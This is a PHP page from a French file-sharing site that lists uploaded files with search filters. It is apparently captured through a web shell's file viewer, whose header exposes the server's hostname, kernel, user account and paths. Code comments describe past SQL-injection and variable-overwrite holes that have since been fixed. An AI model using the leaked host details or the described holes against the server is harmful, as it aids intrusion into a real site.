

Server : Apache
System : Linux ks5.tuic.fr 6.1.0-18-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.76-1 (2024-02-01) x86_64
User : pragmatice ( 1003)
PHP Version : 8.2.24
Disable Function : NONE
Directory :  /home/pragmatice/aftrn/banque_HS/


 

Current File : /home/pragmatice/aftrn/banque_HS/display.php
<?php
session_start();
/***************************************************************************
 *
 *   date                 : Septembre 2002
 *   copyright            : (c) 2002 B&eacute;atrice Arnou
 *   email                : bea@cartables.net
 *
 *   Tout usage de ces scripts doit faire l'objet d'une demande d'autorisation 
 *   et ces mentions ne doivent pas &ecirc;tre retir&eacute;es ou modifi&eacute;es.
 *
 ***************************************************************************/

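// The constant name must be quoted: a bare IN_AFT is an undefined constant,
// which is a fatal Error on PHP 8.
define('IN_AFT', true);

require "lib.php";

// Only a logged-in session may list files. The script stops right after the
// redirect: without exit the listing below would still be produced for a
// visitor who has no session. (The former "\n\n" inside the header value is
// rejected by header() on current PHP, so the redirect was not even sent.)
if (isset($_SESSION['infos']) && is_array($_SESSION['infos'])) {
  extract($_SESSION['infos']);
} else {
  header("Location: login.php");
  exit;
}

/******** Request parameters ***********/

// Every GET/POST key used to be copied into a variable of the same name
// (with each(), which was removed in PHP 8.0). A request could therefore
// overwrite the session values extracted above, $conx, $query or $query2.
// Only the parameters this page reads are accepted now, as scalar strings;
// GET still wins over POST.
// NOTE(review): lib.php and pagination.php are not visible from this file; if
// they read other request parameters through this scope, list them here.
$aft_parametres = array(
  'categorie', 'formatpattern', 'fpattern', 'dpattern', 'nuser',
  'description', 'order', 'nbrenew', 'min', 'npage', 'fin', 'FichiersParPage'
);
// Search criteria exactly as received; they are repeated in the page links.
$aft_criteres = array();
foreach ($aft_parametres as $aft_nom) {
  if (isset($_GET[$aft_nom]) && is_scalar($_GET[$aft_nom])) {
    $$aft_nom = (string) $_GET[$aft_nom];
  } elseif (isset($_POST[$aft_nom]) && is_scalar($_POST[$aft_nom])) {
    $$aft_nom = (string) $_POST[$aft_nom];
  } else {
    continue;
  }
  $aft_criteres[$aft_nom] = $$aft_nom;
}
// These describe one page view, not the search itself.
unset($aft_criteres['min'], $aft_criteres['npage'], $aft_criteres['fin'], $aft_criteres['nbrenew']);

// Text criteria default to the empty string so the tests below stay simple.
foreach (array('categorie', 'formatpattern', 'fpattern', 'dpattern', 'nuser', 'description', 'order') as $aft_nom) {
  if (!isset($$aft_nom) || !is_scalar($$aft_nom)) { $$aft_nom = ''; }
}

// "Latest N files" mode: a non-negative integer, 0 meaning "not requested".
$nbrenew = isset($nbrenew) ? max(0, (int) $nbrenew) : 0;

// The q parameter used to carry a complete base64-encoded SQL statement that
// was decoded and executed as-is, i.e. the client chose the SQL. It is no
// longer read: page links now repeat the search criteria and the statement is
// rebuilt on the server for every page.
// NOTE(review): any other page that still links here with q=... will get the
// default listing and has to be updated to pass the criteria instead.

hautpage();

/******** Pagination ***********/

// Files per page (when nbrenew is not used): a positive integer.
if (!isset($FichiersParPage) || (int) $FichiersParPage < 1) { $FichiersParPage = FICHIERS_PAR_PAGE; }
$FichiersParPage = (int) $FichiersParPage;
if ($FichiersParPage < 1) { $FichiersParPage = 1; } // also avoids a division by zero below
// Paged display is on by default (switched off when nbrenew is used)
$parpage = true;

// Offset of the first file to display
$min = isset($min) ? max(0, (int) $min) : 0;
// Current page number
$npage = isset($npage) ? max(1, (int) $npage) : 1;

// Both values are integers at this point, so they are safe inside the SQL text.
$limit = " LIMIT $min,$FichiersParPage ";

/******** End of pagination ***********/

// Building the query. Every value that ends up inside quotes goes through
// mysqli_real_escape_string(); this relies on the connection character set
// having been set correctly where $conx is opened (not visible here).
$query = "select fichiers.*, categories.*, users.usernom as username, users.useremail as useremail from fichiers, categories, users where 1 and valide='O' ";
$pre=" and ";

// Category
$categorie2 = mysqli_real_escape_string($conx, $categorie);
if ($categorie and $categorie != "*") {
  $query .= " $pre categorie='$categorie2'";
  // NOTE(review): $categ holds the raw request value; escape it wherever it is printed.
  $categ = $categorie;
} else {
  $categ = "Toutes les cat&eacute;gories";
}

// An empty pattern means "anything"
if (!$formatpattern) $formatpattern="*";
if (!$fpattern) $fpattern="*";
if (!$dpattern) $dpattern="*";

// File name: "*" is the user-facing wildcard and becomes the SQL "%"
if ($fpattern != "*") {
   $fpattern = strtolower(str_replace("*","%",$fpattern));
   $fpattern = mysqli_real_escape_string($conx, $fpattern);
   $query .="$pre nomcourt like '%$fpattern%'";
}

// File format
if ($formatpattern != "*"){
   $formatpattern = strtolower(str_replace("*","%",$formatpattern));
   $formatpattern = mysqli_real_escape_string($conx, $formatpattern);
   $query .="$pre format like '%$formatpattern%'";
}

// Sender
if ($nuser and $nuser != "*") {
   $nuser = mysqli_real_escape_string($conx, $nuser);
   $query .= " $pre user like '$nuser'";
}

// Description (matched against the accent-free column)
if($description and $description != "*") {
   $description = str_replace("*","%",$description);
   $description = cleanchaine($description);
   $description = mysqli_real_escape_string($conx, strtolower($description));
   $query .= " $pre desc_sans_accent like '%$description%'";
}

// Join conditions
$query .= " $pre fichiers.categorie = categories.id ";
$query .= " $pre fichiers.user = users.userid ";

// The sort column cannot be quoted or escaped, so it must look like a plain
// column name (optionally table.column); anything else falls back to the
// default sort.
// NOTE(review): a fixed list of the columns the search form actually offers
// would be stricter; the form is not visible from this file.
if (!$order || !preg_match('/^[A-Za-z_][A-Za-z0-9_]*(\.[A-Za-z_][A-Za-z0-9_]*)?$/D', $order)) {
  $order = "time_stamp";
}

$query .= " order by $order";

// Dates, sizes and download counts are listed largest first
if ($order=="time_stamp" || $order=="size" || $order=="downloads") $query .= " desc";

// Always starts empty: this is the LIMIT clause and nothing else.
$query2 = '';

if ($nbrenew) {
  $parpage = false;
  $query2  .=" LIMIT $nbrenew";
} else {
  // Pagination: total number of matches, counted before the LIMIT is added
  $aft_total = mysqli_query($conx,$query.$query2);
  $numtotal  = $aft_total ? mysqli_num_rows($aft_total) : 0;
  if ($aft_total) { mysqli_free_result($aft_total); }
  if (!isset($fin)) {
    $query2  .= $limit;
  }
}

$query_finale = $query.$query2;

$result = mysqli_query($conx,$query_finale);
// mysqli_query() returns false on failure when exceptions are disabled
$num    = $result ? mysqli_num_rows($result) : 0;

if ($nbrenew) {
  $numtotal = max($num,$nbrenew);
}

if ($parpage) {
   // The links carry the URL-encoded search criteria, never SQL text
   $aft_suffixe = $aft_criteres ? "&".http_build_query($aft_criteres, '', '&') : "";
   // Number of pages needed for the display
   $NbrePages = ceil($numtotal / $FichiersParPage);
   $n = 1;
   while ($n <= $NbrePages) {
     $min = ($n-1) * $FichiersParPage;
     $urlpage[$n] = "display.php?min=$min&npage=$n".$aft_suffixe;
     $n++;
   }
}

if ($num == 0) {
  erreur("Aucun fichier trouv&eacute; !","Retour","javascript:history.back()",EMAIL_CONTACT,SUJET_CONTACT);
}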
?>
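<?php
// Results header: link back to the home page, top pager, match count and the
// column titles of the results table. Colours and URLBANQUE are constants
// that this file does not define.
?>
<div align=center class=petit>
<a href="<?php print URLBANQUE ?>/">Retour &agrave; l'accueil</a>
</div>

<?php include "pagination.php"; ?>

<div class="maligne"></div>
<table border=0 bgcolor="<?php print ROUGE ?>" cellspacing=0 cellpadding=0 align=center width=100%>
<tr>
<th>
<div align="center" style="color:<?php print JAUNEPALE ?>;">
<?php $pluriel = ($numtotal > 1) ? "s" : ""; ?>
&nbsp;<?php print $numtotal." document".$pluriel." trouv&eacute;".$pluriel."&nbsp;"; ?>
</div>
</th>
</tr>
<tr>
<td>
   <table border=0 bgcolor="<?php print JAUNE ?>" cellspacing=0 cellpadding=4 bordercolor="<?php print ROUGE ?>" width=100% style="border-left: <?php print ROUGE ?> 1px solid; border-top: <?php print ROUGE ?> 1px solid">
   <tr>
   <th align=left class=petit width=30% style="border-bottom: <?php print ROUGE ?> 1px solid; border-right: <?php print ROUGE ?> 1px solid;">
     Nom&nbsp;de&nbsp;fichier
   </th>
   <th align=center class=petit style="border-bottom: <?php print ROUGE ?> 1px solid; border-right: <?php print ROUGE ?> 1px solid;">
     Cat&eacute;gorie
   </th>
   <th align=center class=petit width=15% style="border-bottom: <?php print ROUGE ?> 1px solid; border-right: <?php print ROUGE ?> 1px solid;">
     Options
   </th>
   <th align=center class=petit style="border-bottom: <?php print ROUGE ?> 1px solid; border-right: <?php print ROUGE ?> 1px solid;">
     Format
   </th>
   <th align=center class=petit style="border-bottom: <?php print ROUGE ?> 1px solid; border-right: <?php print ROUGE ?> 1px solid;">
     Taille
   </th>
   <th align=center class=petit style="border-bottom: <?php print ROUGE ?> 1px solid; border-right: <?php print ROUGE ?> 1px solid;">
     Exp&eacute;diteur
   </th>
   <th align=center class=petit style="border-bottom: <?php print ROUGE ?> 1px solid; border-right: <?php print ROUGE ?> 1px solid;">
     Date
   </th>
   </tr>
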
<?php 
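// One table row per file. Rows alternate between the two yellow shades.
$color = JAUNE;
// Names a result column must never overwrite: the loop's own state and the
// database handle.
$aft_proteges = array('this', 'result', 'row', 'color', 'conx', 'key', 'val', 'aft_proteges');
// $result is false when the query failed, in which case no row is printed.
while ($result && ($row = mysqli_fetch_assoc($result))) {
  // Each column becomes a variable of the same name ($size, $nomcourt, ...).
  // foreach replaces each(), which was removed in PHP 8.0.
  foreach ($row as $key => $val) {
    if (!in_array($key, $aft_proteges, true)) {
      $$key = $val;
    }
  }
  // Thousands separated by non-breaking spaces, no decimals
  $size        = number_format((float) $size,0,","," ");
  $size        = str_replace(" ","&nbsp;",$size);
  $downloads   = number_format((float) $downloads,0,","," ");
  $downloads   = str_replace(" ","&nbsp;",$downloads);
  // time_stamp is passed to date() as a Unix timestamp
  $time_stamp  = date("d/m/Y",(int) $time_stamp);

  $filename    = $dir."/".$nomcourt;

  // Turn URLs in the description into clickable links.
  // NOTE(review): the description, names and e-mail addresses come from user
  // submissions stored in the database. Whether make_links() and
  // affiche_record() HTML-escape them is not visible from this file; confirm
  // that one of them does before the values reach the page.
  $description2 = make_links($description);

  if ($color == JAUNE) { $color = JAUNEPALE; } else { $color = JAUNE; }
  print "<tr bgcolor=$color>\n";
  // NOTE(review): utf8_encode() is deprecated since PHP 8.2; it converts
  // ISO-8859-1 text to UTF-8.
  affiche_record($idfile,$nomcourt,$categorie,
                 utf8_encode($format),$time_stamp,
                 $size,$downloads,$user,$local,
                 utf8_encode($nom),$dir,$filename,utf8_encode($description2),
                 $Sessusernom,$Sessuseremail,$Sessuserid,
                 utf8_encode($username),$useremail);
  // $Sessusernom is the user name stored in the session variables
  // $user is the user code stored in the fichiers table (whoever posted the file)
  // $username is the name of the user matching $user, read from the users table

  print "</tr>\n";
}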
?>
</table>
</td>
</tr>
</table>

<?php

// Second pager, below the results table.
include("pagination.php");

// Shared page footer.
baspage();

?>
